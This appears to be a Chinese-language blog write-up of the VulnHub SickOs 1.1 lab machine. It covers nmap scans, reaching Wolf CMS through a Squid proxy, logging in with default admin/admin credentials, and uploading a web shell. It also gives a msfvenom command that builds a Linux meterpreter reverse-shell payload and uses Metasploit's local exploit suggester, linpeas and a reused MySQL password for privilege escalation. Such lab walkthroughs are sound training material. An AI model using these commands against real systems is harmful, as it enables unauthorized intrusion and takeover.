vulnhub-sickos1.1
forg12
  2022-08-12 09:37:06 2022-08-12 09:37      460 字  

概要

主机发现

1
2
3
4
sudo nmap -sP 192.168.2.0/24          

Nmap scan report for 192.168.2.186
Host is up (0.11s latency).

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -p- -Pn 192.168.2.186
Starting Nmap 7.92 ( https://nmap.org ) 
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 31.73% done; ETC: 15:56 (0:01:37 remaining)
Nmap scan report for 192.168.2.186
Host is up (0.011s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 122.47 seconds

服务探针

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -p22,3128,8080 -sV -A -T4 -Pn 192.168.2.186
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.186
Host is up (0.0065s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.44 seconds

信息收集

​ 这里要通过他的代理3128才能访问到80端口。

image-20220818160514659

robots.txt

image-20220818163032617

漏洞利用

​ 网页搜索wolf cms exploit

image-20220818163308412

​ 访问漏洞URL

image-20220818163429154

1
http://192.168.2.186/wolfcms/?/admin/plugin/file_manager/browse/

​ 弹出登录框,输入admin/admin进入。

image-20220818164113422

image-20220818163559590

​ 上传成功。

image-20220818164500153

image-20220818164540411

​ 连接成功,但是这里要注意,需要在蚁剑里配置代理。

image-20220818164657593

image-20220818164810660

​ 获得低权限。

image-20220818164943528

权限提升

msf

​ 给msf一个会话,使用 local_exploit_suggester 查看是否有可利用的漏洞。

1
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.192 lport=3311 -f elf > a.elf

image-20220818165205339

image-20220818165502062

1
use post/multi/recon/local_exploit_suggester

image-20220818165801555

Linpeas.sh

image-20220818170925356

image-20220818171010281

​ sickos用户加入了sudo组,收集到的mysql root账号的密码正好可以登录sickos用户。

image-20220818174515222

image-20220818174646346

flag

image-20220818174732427